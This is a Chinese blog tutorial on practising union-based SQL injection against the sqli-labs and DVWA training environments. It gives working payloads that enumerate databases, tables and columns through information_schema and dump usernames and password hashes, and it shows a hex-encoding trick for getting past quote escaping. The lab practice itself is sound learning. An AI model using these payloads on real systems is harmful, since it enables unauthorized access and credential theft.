首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
Mysql Online DDL的使用详解
May 20 MySQL
my.ini优化mysql数据库性能的十个参数(推荐)
May 26 MySQL
MySQL中in和exists区别详解
Jun 03 MySQL
MySQL 外键约束和表关系相关总结
Jun 20 MySQL
mysql 数据插入优化方法之concurrent_insert
Jul 01 MySQL
MySQL系列之九 mysql查询缓存及索引
Jul 02 MySQL
Mysql8.0递归查询的简单用法示例
Aug 04 MySQL
面试被问select......for update会锁表还是锁行
Nov 11 MySQL
SQL基础的查询语句
Nov 11 MySQL
MySQL日期时间函数知识汇总
Mar 17 MySQL
MySql按时,天,周,月进行数据统计
Aug 14 MySQL
MySQL count(*)统计总数问题汇总
Sep 23 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
遗弃(1) 战锤40K(1) AGC(1) 铁拳(1) 绿林侠盗(1) 大话西游(1) 死亡搁浅(1) 吸血鬼(1) 模拟人生(1) 原神(1)
You might like
Windows下安装Memcached的步骤说明
2010/04/25 PHP
献给php初学者(入门学习经验谈)
2010/10/12 PHP
js判断变量是否空值的代码
2008/10/26 Javascript
JavaScript面向对象之体会[总结]
2008/11/13 Javascript
JS读取cookies信息(记录用户名)
2012/01/10 Javascript
js导出table到excel同时兼容FF和IE示例
2013/09/03 Javascript
JS字符串拼接在ie中都报错的解决方法
2014/03/27 Javascript
iframe窗口高度自适应的又一个巧妙实现思路
2014/04/04 Javascript
JavaScript实现点击文字切换登录窗口的方法
2015/05/11 Javascript
jQuery实现带延迟的二级tab切换下拉列表效果
2015/09/01 Javascript
如何在 Vue.js 中使用第三方js库
2017/04/25 Javascript
值得收藏的vuejs安装教程
2017/11/21 Javascript
详解Nodejs mongoose
2018/06/10 NodeJs
详解Vue中的MVVM原理和实现方法
2020/07/15 Javascript
js实现日历
2020/11/07 Javascript
python 多线程应用介绍
2012/12/19 Python
TensorFlow实现Softmax回归模型
2018/03/09 Python
Python创建或生成列表的操作方法
2019/06/19 Python
如何使用Python 打印各种三角形
2019/06/28 Python
python写入文件自动换行问题的方法
2019/07/05 Python
Python 取numpy数组的某几行某几列方法
2019/10/24 Python
python中从for循环延申到推导式的具体使用
2019/11/29 Python
python 6.7 编写printTable()函数表格打印(完整代码)
2020/03/25 Python
推荐技术人员一款Python开源库(造数据神器)
2020/07/08 Python
通过Python实现Payload分离免杀过程详解
2020/07/13 Python
python实现粒子群算法
2020/10/15 Python
彪马俄罗斯官网:PUMA俄罗斯
2019/07/13 全球购物
Furla官网:意大利著名的皮革品牌
2019/08/06 全球购物
葬礼司仪主持词
2014/03/31 职场文书
公司委托书格式范本
2014/09/16 职场文书
全国爱眼日活动总结
2015/02/27 职场文书
工作失职检讨书范文
2015/05/05 职场文书
升学宴学生致辞
2015/07/27 职场文书
Angular性能优化之第三方组件和懒加载技术
2021/05/10 Javascript
Python可视化动图组件ipyvizzu绘制惊艳的可视化动图
2022/04/21 Python
MySQL中的全表扫描和索引树扫描
2022/05/15 MySQL